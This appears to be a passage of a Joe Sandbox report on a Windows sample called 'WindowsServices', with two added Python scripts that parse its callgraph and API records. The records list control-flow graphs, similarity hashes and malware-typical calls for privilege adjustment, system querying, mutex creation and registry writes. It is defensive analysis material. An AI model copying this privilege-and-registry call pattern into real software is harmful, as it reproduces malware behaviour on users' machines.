                                                                        callgraph 0 Function_00FC067F 1 Function_04D30BD0 2 Function_00B32430 3 Function_04D308D5 4 Function_04D311D5 5 Function_00B322B4 6 Function_00FC0074 7 Function_04D306DB 8 Function_00B3A73F 9 Function_00B3A0BE 10 Function_00B3A23C 11 Function_04D30A5C 12 Function_00B323BC 13 Function_00B3213C 14 Function_00FC026D 15 Function_00FC066A 16 Function_00FC05E1 17 Function_00B3A6AE 18 Function_00B3A02E 19 Function_00B3A893 20 Function_00B3A392 21 Function_00B3A812 22 Function_00B3AB92 23 Function_04D30971 24 Function_00B32310 25 Function_00B3AA15 26 Function_04D30FF5 27 Function_00B32194 28 Function_00B3A99A 29 Function_04D30278 67 Function_04D30C30 29->67 30 Function_04D30AF8 31 Function_00B32098 32 Function_00FC05D0 33 Function_00B3A602 34 Function_00FC0648 34->15 35 Function_00B3A486 36 Function_00B3A186 37 Function_00B32006 38 Function_00B3A005 39 Function_04D30268 39->67 40 Function_04D313E8 41 Function_00FC05C0 42 Function_00FC0740 43 Function_00B3A20C 44 Function_04D30392 45 Function_04D30C10 46 Function_00B321F0 47 Function_00B3A776 48 Function_00B323F4 49 Function_00B3A67B 50 Function_00B3A078 51 Function_00B3A2FE 52 Function_00B3247D 53 Function_00B3A462 54 Function_00B3A361 55 Function_00B3A960 56 Function_04D30080 57 Function_04D30007 57->16 57->29 57->39 57->44 83 Function_00FC0606 57->83 84 Function_04D30429 57->84 58 Function_00B3A5E4 59 Function_00B32264 60 Function_00B32364 61 Function_00B3A56E 62 Function_00B3AAEE 63 Function_00B3A7EC 64 Function_00B3A2D2 65 Function_00B3A5D1 66 Function_00B3A751 68 Function_00B320D0 69 Function_00B32458 70 Function_00B3A25E 71 Function_00FC0711 72 Function_04D30B3E 73 Function_00B3A45C 74 Function_00B3A140 75 Function_00B3A540 76 Function_00B3AAC0 77 Function_00B3ABC6 78 Function_00B3AA46 79 Function_00FC000A 80 Function_00B324C5 81 Function_00B32044 82 Function_00B3A8CA 85 Function_04D30729 86 Function_00FC0001
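The execution graph and callgraph lines above are the node and edge labels of two rendered figures flattened into text: an integer opens a node, the token after it is that node's address (execution graph) or Function_ name (callgraph), bare words are the API calls Joe Sandbox annotated on the node, and a->b tokens are edges. The Python below is an added example, not part of the Joe Sandbox report or its tooling. It parses text in that layout (the token interpretation is a reading of the extracted figure, not a documented format) and answers the triage question an analyst wants from these figures: for each entry node, which APIs and which callees does it reach. Both inputs are constructed, abridged from the process 17 lines on this page.

```python
"""Parse the flattened execution graph / callgraph text a Joe Sandbox report
leaves where those figures were rendered, and report which API calls and
callees each entry node reaches."""
import re
from collections import defaultdict

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
# A node's first token is a hex address (execution graph) or Function_XXXX (callgraph)
ADDR_RE = re.compile(r"^[0-9a-fA-F]{5,}$|^Function_[0-9A-Fa-f]+$")

# Constructed samples, abridged from the process 17 execution graph and
# callgraph text of this report.
EXEC_GRAPH = ("execution_graph 834 b3a893 835 b3a89d AdjustTokenPrivileges 834->835 "
              "837 b3a91b 835->837 838 b3ab92 840 b3abc6 CreateMutexW 838->840 "
              "841 b3ac41 840->841 846 b3a67b 847 b3a6ae LookupPrivilegeValueW 846->847 "
              "849 b3a6fe 847->849 850 b3a462 852 b3a486 RegSetValueExW 850->852 "
              "853 b3a507 852->853")
CALL_GRAPH = ("callgraph 29 Function_04D30278 67 Function_04D30C30 29->67 "
              "39 Function_04D30268 39->67 57 Function_04D30007 57->16 57->29 "
              "57->39 57->44 83 Function_00FC0606 57->83 16 Function_00FC05E1 "
              "44 Function_04D30392 34 Function_00FC0648 34->15 15 Function_00FC066A")


def parse_graph(text):
    """Return (nodes, edges). Token layout, as read from the extracted figure:
    an integer opens a node, the token after it is the node's address or
    function name, further bare words are API labels, 'a->b' is an edge."""
    nodes, edges, current = {}, defaultdict(list), None
    for tok in text.split()[1:]:  # first token is the figure name
        m = EDGE_RE.match(tok)
        if m:
            edges[int(m.group(1))].append(int(m.group(2)))
        elif current is not None and nodes[current]["addr"] is None and ADDR_RE.match(tok):
            nodes[current]["addr"] = tok  # checked before isdigit so an all-digit address is not taken for an id
        elif tok.isdigit():
            current = int(tok)
            nodes[current] = {"addr": None, "labels": []}
        elif current is not None:
            nodes[current]["labels"].append(tok)
    return nodes, edges


def entry_nodes(nodes, edges):
    """Node ids with no incoming edge: the entry points of the dumped code."""
    targets = {t for succ in edges.values() for t in succ}
    return sorted(n for n in nodes if n not in targets)


def reachable(edges, start):
    """Ids reachable from start (start included), by depth-first walk."""
    seen, stack = set(), [start]
    while stack:
        n = stack.pop()
        if n not in seen:
            seen.add(n)
            stack.extend(edges.get(n, []))
    return seen


def entry_summary(text):
    """Map each entry's address/name -> its reachable API labels and callees."""
    nodes, edges = parse_graph(text)
    out = {}
    for e in entry_nodes(nodes, edges):
        reach = reachable(edges, e)
        out[nodes[e]["addr"]] = {
            "apis": sorted(l for n in reach if n in nodes for l in nodes[n]["labels"]),
            "calls": sorted(nodes[n]["addr"] for n in reach if n != e and n in nodes),
        }
    return out


if __name__ == "__main__":
    for graph in (EXEC_GRAPH, CALL_GRAPH):
        for entry, info in entry_summary(graph).items():
            print(f"{entry}: apis={info['apis']} calls={info['calls']}")
```

Run stand-alone, the execution-graph half reports that the entry at b3a893 reaches AdjustTokenPrivileges, b3ab92 reaches CreateMutexW, b3a67b reaches LookupPrivilegeValueW and b3a462 reaches RegSetValueExW; the callgraph half shows Function_04D30007 fanning out to six callees, reaching Function_04D30C30 through Function_04D30278. Feeding the full lines from the page instead of the abridged samples works the same way, since the parser only depends on the token layout.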

                                                                        Control-flow Graph

                                                                        control_flow_graph 288 b3a893-b3a8f7 292 b3a8f9 288->292 293 b3a8fc-b3a90b 288->293 292->293 294 b3a94e-b3a953 293->294 295 b3a90d-b3a92d AdjustTokenPrivileges 293->295 294->295 298 b3a955-b3a95a 295->298 299 b3a92f-b3a94b 295->299 298->299
                                                                        APIs
                                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00B3A913
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustPrivilegesToken
                                                                        • String ID:
                                                                        • API String ID: 2874748243-0
                                                                        • Opcode ID: b4f7723548be4f49b9b94fd31ab79ae34ad0ac4e991f7eecdda88dab381cbdcb
                                                                        • Instruction ID: 9d43aed0f1d7ccb1ec055d8b3dabbd65b09b0eeb555afcef98b4250c5b19b797
                                                                        • Opcode Fuzzy Hash: b4f7723548be4f49b9b94fd31ab79ae34ad0ac4e991f7eecdda88dab381cbdcb
                                                                        • Instruction Fuzzy Hash: 6421E2765093809FDB238F25DC44B52BFF4EF06310F1985DAE9858F563D270A908CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 368 b3aa15-b3aa79 370 b3aaa6-b3aaab 368->370 371 b3aa7b-b3aa8e NtQuerySystemInformation 368->371 370->371 372 b3aa90-b3aaa3 371->372 373 b3aaad-b3aab2 371->373 373->372
                                                                        APIs
                                                                        • NtQuerySystemInformation.NTDLL ref: 00B3AA81
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: InformationQuerySystem
                                                                        • String ID:
                                                                        • API String ID: 3562636166-0
                                                                        • Opcode ID: 55c1b03e02f7d8a3ece76b9a5c935d242a18bbc4d55b3bcb2cb8d1b6c98fea5a
                                                                        • Instruction ID: 6fb92a80d4cfce670d38a2ef03db1d43a01fb0919b06c7b22cd8a116ff6856c4
                                                                        • Opcode Fuzzy Hash: 55c1b03e02f7d8a3ece76b9a5c935d242a18bbc4d55b3bcb2cb8d1b6c98fea5a
                                                                        • Instruction Fuzzy Hash: 0C11DD724093C09FDB228F10DC44A92FFF4EF06324F0984CAED848B663D275A908CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00B3A913
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustPrivilegesToken
                                                                        • String ID:
                                                                        • API String ID: 2874748243-0
                                                                        • Opcode ID: 596ecdd146a494e9e30f4ee640d43eeb6f6d88c01057724a19366ffa646d8c9b
                                                                        • Instruction ID: b45ab6bb710bf644d5dbf8e83af3ee1ae784c3cc5ab6c256354a94d5d9c5c5ab
                                                                        • Opcode Fuzzy Hash: 596ecdd146a494e9e30f4ee640d43eeb6f6d88c01057724a19366ffa646d8c9b
                                                                        • Instruction Fuzzy Hash: 1811A0766003049FDB20CF55DD88B52FBE4EF04320F2885AADD858BA52D331E818DF62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtQuerySystemInformation.NTDLL ref: 00B3AA81
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: InformationQuerySystem
                                                                        • String ID:
                                                                        • API String ID: 3562636166-0
                                                                        • Opcode ID: 6eea277e381ea4ad8affc777e94a96437ac7762647bc88a1a10f89399bf0d550
                                                                        • Instruction ID: ce00fcc4f2f44761d46f6e40e555bc22b8aff4726e7a5b6a9cf97bc0fad60060
                                                                        • Opcode Fuzzy Hash: 6eea277e381ea4ad8affc777e94a96437ac7762647bc88a1a10f89399bf0d550
                                                                        • Instruction Fuzzy Hash: F001A2365002049FDB208F05DA88B62FBE0FF48720F28C49ADE854BB52D375E418DFA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%
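Each function record above follows one shape: an APIs list (call name, module, optional arguments and the ref: address of the call site, sometimes prefixed "Part of subcall function"), a Memory Dump Source, the IDA plugin snapshot file, the Similarity hashes and a Uniqueness score. The Python below is an added example, not part of the Joe Sandbox report or its tooling. It parses records in that shape into dicts, strips the page's "Download File" link text from Associated entries, lists the API call sites per snapshot, and flags records whose call sites are identical, which is how the two AdjustTokenPrivileges records at ref 00B3A913 (the same code region analysed from two entry points, hence two Opcode IDs) and the two NtQuerySystemInformation records at ref 00B3AA81 show up. The sample text is constructed, abridged from records on this page.

```python
"""Parse the per-function records a Joe Sandbox report prints ("APIs", "Memory
Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Uniqueness") and
summarise which APIs each memory snapshot reaches."""
import re
from collections import defaultdict

HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Uniqueness"}
BULLET = "\u2022"  # the "•" that prefixes every field line in the report
API_RE = re.compile(r"(?:Part of subcall function (?P<subcall>[0-9A-Fa-f]+): )?"
                    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(r"Source File: (?P<file>\S+), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)")

# Constructed sample: four records abridged from this report (process 14 at
# 0x400000, process 17 at 0xB3A000) in the shape the page prints them.
SAMPLE = """\
• Executed
APIs
• Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025FE
• SetWindowRgn.USER32(?,0040C340,00000001), ref: 00409DBF
• SetCapture.USER32(?), ref: 00409DC9
Memory Dump Source
• Source File: 0000000E.00000002.1683756741.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.1683727585.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_WindowsServices.jbxd
Similarity
• Opcode ID: 4a7094b539b862f338539457f0d8793b4a741916dd4dc3ebb93e6d5d52ff0bfe
Uniqueness Score: -1.00%
APIs
• AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00B3A913
Memory Dump Source
• Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
Similarity
• Opcode ID: b4f7723548be4f49b9b94fd31ab79ae34ad0ac4e991f7eecdda88dab381cbdcb
Uniqueness Score: -1.00%
APIs
• NtQuerySystemInformation.NTDLL ref: 00B3AA81
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
Uniqueness Score: -1.00%
APIs
• AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00B3A913
Memory Dump Source
• Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
Similarity
• Opcode ID: 596ecdd146a494e9e30f4ee640d43eeb6f6d88c01057724a19366ffa646d8c9b
Uniqueness Score: -1.00%
"""


def parse_records(text):
    """One dict per analysed function; graph dumps, legends and blanks are skipped."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADERS:
            section = line
            rec = rec or {"apis": [], "strings": [], "associated": [], "fields": {}}
        elif line.startswith("Uniqueness Score:") and rec:
            rec["fields"]["uniqueness_score"] = line.split(":", 1)[1].strip()
            records.append(rec)
            rec = section = None
        elif line.startswith(BULLET) and section:
            item = line[1:].strip()
            if section == "APIs":
                m = API_RE.match(item)
                if m:
                    rec["apis"].append(m.groupdict())
            elif section == "Strings":
                rec["strings"].append(item)
            elif section == "Memory Dump Source":
                m = SOURCE_RE.match(item)
                if m:
                    rec["fields"].update(m.groupdict())
                elif item.startswith("Associated:"):  # drop the page's link text
                    rec["associated"].append(item[11:].replace("Download File", "").strip())
            else:  # "Joe Sandbox IDA Plugin" and "Similarity" hold "Key: value" pairs
                key, _, value = item.partition(":")
                rec["fields"][key.strip().lower().replace(" ", "_")] = value.strip()
    return records


def apis_by_snapshot(records):
    """Map snapshot file -> sorted unique 'Name.Module@ref' call sites."""
    out = defaultdict(set)
    for rec in records:
        for api in rec["apis"]:
            out[rec["fields"].get("snapshot_file")].add(f"{api['name']}.{api['module']}@{api['ref']}")
    return {k: sorted(v) for k, v in out.items()}


def duplicate_analyses(records):
    """Group Opcode IDs of records whose API call sites are identical: one code region, several entry points."""
    groups = defaultdict(list)
    for rec in records:
        key = (rec["fields"].get("snapshot_file"), tuple(sorted(a["ref"] for a in rec["apis"])))
        if key[1]:
            groups[key].append(rec["fields"].get("opcode_id"))
    return {k: v for k, v in groups.items() if len(v) > 1}
```

On the sample, apis_by_snapshot puts the USER32 window calls under the 0x400000 snapshot of process 14 and AdjustTokenPrivileges plus NtQuerySystemInformation under the 0xB3A000 snapshot of process 17, and duplicate_analyses reports the two Opcode IDs that share the single call site 00B3A913. Collapsing such duplicates before writing detection content avoids counting the same dumped region twice; the Instruction Fuzzy Hash, not the Opcode ID, is the field that differs between them.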

                                                                        Control-flow Graph

                                                                        control_flow_graph 0 4d30278-4d302a6 1 4d302a8 call 4d30c30 0->1 2 4d302ae-4d302bc 0->2 1->2 3 4d302c2-4d30305 2->3 4 4d303d8-4d303ec 2->4 22 4d303b9-4d303d2 3->22 7 4d303f2-4d3046b 4->7 8 4d30475-4d304c8 4->8 7->8 20 4d304ca 8->20 21 4d304cf-4d304e9 8->21 20->21 25 4d30520-4d30677 21->25 26 4d304eb-4d30515 21->26 22->4 24 4d3030a-4d30316 22->24 27 4d30bbd 24->27 28 4d3031c-4d3034d 24->28 60 4d306ff-4d30bb8 25->60 61 4d3067d-4d306bb 25->61 26->25 30 4d30bc2-4d30c05 27->30 38 4d30390-4d303b3 28->38 39 4d3034f-4d30385 28->39 38->22 38->30 39->38 61->60
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1777067238.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_4d30000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2k$2k
                                                                        • API String ID: 0-107389494
                                                                        • Opcode ID: 7174581b17db1c86a823dd2d6d8aa7009f38da43073a18ef64bc4d998f444569
                                                                        • Instruction ID: 2643a25b9cf7770e31f5176f5b3984333b778843960310362e5c7483cbd6913d
                                                                        • Opcode Fuzzy Hash: 7174581b17db1c86a823dd2d6d8aa7009f38da43073a18ef64bc4d998f444569
                                                                        • Instruction Fuzzy Hash: 43B17934A01218CFDB15EF74D948BACB7B2BF45309F1084A9D449AB395DB399E85CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 68 4d30268-4d302a6 70 4d302a8 call 4d30c30 68->70 71 4d302ae-4d302bc 68->71 70->71 72 4d302c2-4d30305 71->72 73 4d303d8-4d303ec 71->73 91 4d303b9-4d303d2 72->91 76 4d303f2-4d3046b 73->76 77 4d30475-4d304c8 73->77 76->77 89 4d304ca 77->89 90 4d304cf-4d304e9 77->90 89->90 94 4d30520-4d30677 90->94 95 4d304eb-4d30515 90->95 91->73 93 4d3030a-4d30316 91->93 96 4d30bbd 93->96 97 4d3031c-4d3034d 93->97 129 4d306ff-4d30bb8 94->129 130 4d3067d-4d306bb 94->130 95->94 99 4d30bc2-4d30c05 96->99 107 4d30390-4d303b3 97->107 108 4d3034f-4d30385 97->108 107->91 107->99 108->107 130->129
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1777067238.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_4d30000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2k$2k
                                                                        • API String ID: 0-107389494
                                                                        • Opcode ID: bba5f3abc16e8a9f8d79f799cc22fa36a67f893f739a0b6156a9dccc3ce04efa
                                                                        • Instruction ID: 004939407502e3ee2900bfd358988e162364f01c73d71234c7117be5589ab17d
                                                                        • Opcode Fuzzy Hash: bba5f3abc16e8a9f8d79f799cc22fa36a67f893f739a0b6156a9dccc3ce04efa
                                                                        • Instruction Fuzzy Hash: 56818974A01218CFDB24EF74C945BADB7B2BF85309F1080A9D409AB394DB399E85CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 137 4d30392-4d303ad 141 4d303af-4d303b3 137->141 142 4d30bc2-4d30c05 141->142 143 4d303b9-4d303d2 141->143 144 4d3030a-4d30316 143->144 145 4d303d8-4d303ec 143->145 147 4d30bbd 144->147 148 4d3031c-4d3034d 144->148 152 4d303f2-4d3046b 145->152 153 4d30475-4d304c8 145->153 147->142 159 4d30390 148->159 160 4d3034f-4d30385 148->160 152->153 168 4d304ca 153->168 169 4d304cf-4d304e9 153->169 159->141 160->159 168->169 172 4d30520-4d30677 169->172 173 4d304eb-4d30515 169->173 192 4d306ff-4d30bb8 172->192 193 4d3067d-4d306bb 172->193 173->172 193->192
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1777067238.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_4d30000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2k$2k
                                                                        • API String ID: 0-107389494
                                                                        • Opcode ID: 5db4e202164e3169145fbcf2ed61faa3d947f6bc44419bc86cb31f8475935ca9
                                                                        • Instruction ID: cf6b7095f6c8aa6a911780f7ffee28f6ab8121be31fb5b4dce6eec567a5e25c4
                                                                        • Opcode Fuzzy Hash: 5db4e202164e3169145fbcf2ed61faa3d947f6bc44419bc86cb31f8475935ca9
                                                                        • Instruction Fuzzy Hash: FE615D74A01218CFDB54EF74C945BECB7B2BF85308F5080A9D409AB695DB399E85CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 199 4d30429-4d304c8 210 4d304ca 199->210 211 4d304cf-4d304e9 199->211 210->211 213 4d30520-4d30677 211->213 214 4d304eb-4d30515 211->214 233 4d306ff-4d30bb8 213->233 234 4d3067d-4d306bb 213->234 214->213 234->233
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1777067238.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_4d30000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2k$2k
                                                                        • API String ID: 0-107389494
                                                                        • Opcode ID: 40335d56aa5003f191a86380497cea29cb25f4825b51235ce5a9eb97860642c3
                                                                        • Instruction ID: 22a9112979be206e5fbdde141aa2d0436a92df36ec8e1da4f7558808f00a965c
                                                                        • Opcode Fuzzy Hash: 40335d56aa5003f191a86380497cea29cb25f4825b51235ce5a9eb97860642c3
                                                                        • Instruction Fuzzy Hash: 24515B34A01218CFDB64EF74C945BECB7B1AF85308F5080E9D009AB694DB34AE89CF61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 240 b3ab92-b3ac15 244 b3ac17 240->244 245 b3ac1a-b3ac23 240->245 244->245 246 b3ac25 245->246 247 b3ac28-b3ac31 245->247 246->247 248 b3ac33-b3ac57 CreateMutexW 247->248 249 b3ac82-b3ac87 247->249 252 b3ac89-b3ac8e 248->252 253 b3ac59-b3ac7f 248->253 249->248 252->253
                                                                        APIs
                                                                        • CreateMutexW.KERNELBASE(?,?), ref: 00B3AC39
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CreateMutex
                                                                        • String ID:
                                                                        • API String ID: 1964310414-0
                                                                        • Opcode ID: 8a2adf70abb0ab5e57d5e008043c2758de48b04fa79b82a9b46ba879295b04d2
                                                                        • Instruction ID: db4a68b484601f2f845ec8531cb8d16e1515b2a2cc25e530d95417f4e95b19ec
                                                                        • Opcode Fuzzy Hash: 8a2adf70abb0ab5e57d5e008043c2758de48b04fa79b82a9b46ba879295b04d2
                                                                        • Instruction Fuzzy Hash: 0731AFB55093806FE712CB25DD48B96FFF8EF06314F18849AE9848B292D335A909C762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 256 b3a361-b3a3cf 259 b3a3d1 256->259 260 b3a3d4-b3a3dd 256->260 259->260 261 b3a3e2-b3a3e8 260->261 262 b3a3df 260->262 263 b3a3ea 261->263 264 b3a3ed-b3a404 261->264 262->261 263->264 266 b3a406-b3a419 RegQueryValueExW 264->266 267 b3a43b-b3a440 264->267 268 b3a442-b3a447 266->268 269 b3a41b-b3a438 266->269 267->266 268->269
                                                                        APIs
                                                                        • RegQueryValueExW.KERNELBASE(?,00000E24,E324DF60,00000000,00000000,00000000,00000000), ref: 00B3A40C
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue
                                                                        • String ID:
                                                                        • API String ID: 3660427363-0
                                                                        • Opcode ID: 3293aefcbf040fd96f053a70fa254541c70c8c6032746be73e31e01cc9578834
                                                                        • Instruction ID: d90d006dc7970d12d0534e7c4d50d65c7fc08a06742bbf48e6959e7f0f26f854
                                                                        • Opcode Fuzzy Hash: 3293aefcbf040fd96f053a70fa254541c70c8c6032746be73e31e01cc9578834
                                                                        • Instruction Fuzzy Hash: B23184755047405FD721CF15DC84F92BBF8EF06710F1884DAE9858B692D364E909CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 273 b3a462-b3a4c3 276 b3a4c5 273->276 277 b3a4c8-b3a4d4 273->277 276->277 278 b3a4d6 277->278 279 b3a4d9-b3a4f0 277->279 278->279 281 b3a4f2-b3a505 RegSetValueExW 279->281 282 b3a527-b3a52c 279->282 283 b3a507-b3a524 281->283 284 b3a52e-b3a533 281->284 282->281 284->283
                                                                        APIs
                                                                        • RegSetValueExW.KERNELBASE(?,00000E24,E324DF60,00000000,00000000,00000000,00000000), ref: 00B3A4F8
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID:
                                                                        • API String ID: 3702945584-0
                                                                        • Opcode ID: f420e9f77487205367c29706cb44f07636f07b4b680fd941080d9c1247f93a82
                                                                        • Instruction ID: fc5a53f551e4e3f98ec0b5965ef89fb8bb3396cf8360b5ec174a6765402b1689
                                                                        • Opcode Fuzzy Hash: f420e9f77487205367c29706cb44f07636f07b4b680fd941080d9c1247f93a82
                                                                        • Instruction Fuzzy Hash: AF2192B65043806FD7228F11DD44FA7BFF8DF46710F18849AE985CB652D264E948C771
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 301 b3a67b-b3a6d5 303 b3a6d7 301->303 304 b3a6da-b3a6e0 301->304 303->304 305 b3a6e2 304->305 306 b3a6e5-b3a6ee 304->306 305->306 307 b3a731-b3a736 306->307 308 b3a6f0-b3a6f8 LookupPrivilegeValueW 306->308 307->308 309 b3a6fe-b3a710 308->309 311 b3a712-b3a72e 309->311 312 b3a738-b3a73d 309->312 312->311
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00B3A6F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 59ccae5ff555bd440ac5d6047e6e4c3c5a18536b92dfb4043b342caad3a91428
                                                                        • Instruction ID: b07188366dced1a51eb24b2e22d0933ef2558f5f20dfbde08e76e2ce9b71ef0e
                                                                        • Opcode Fuzzy Hash: 59ccae5ff555bd440ac5d6047e6e4c3c5a18536b92dfb4043b342caad3a91428
                                                                        • Instruction Fuzzy Hash: 042180766093805FD7128B65DC95B92BFF8EF06320F1984DAE984CB6A3D224D909C762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 314 b3abc6-b3ac15 317 b3ac17 314->317 318 b3ac1a-b3ac23 314->318 317->318 319 b3ac25 318->319 320 b3ac28-b3ac31 318->320 319->320 321 b3ac33-b3ac3b CreateMutexW 320->321 322 b3ac82-b3ac87 320->322 324 b3ac41-b3ac57 321->324 322->321 325 b3ac89-b3ac8e 324->325 326 b3ac59-b3ac7f 324->326 325->326
                                                                        APIs
                                                                        • CreateMutexW.KERNELBASE(?,?), ref: 00B3AC39
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750907724.0000000000B3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b3a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CreateMutex
                                                                        • String ID:
                                                                        • API String ID: 1964310414-0
                                                                        • Opcode ID: 2fdcc6c9851cc413460f803a471c7588246d2f5022cc6047f6a6e62e4915df34
                                                                        • Instruction ID: c3386db4a1b3531d707b8a909a1a70f1a75d9cc3dfd80ea93e0d7c05f7beaef4
                                                                        • Opcode Fuzzy Hash: 2fdcc6c9851cc413460f803a471c7588246d2f5022cc6047f6a6e62e4915df34
                                                                        • Instruction Fuzzy Hash: 202195755042049FE710DF25DD49B96FBE8EF04314F248499ED848B741D375E909CB72
                                                                        Uniqueness

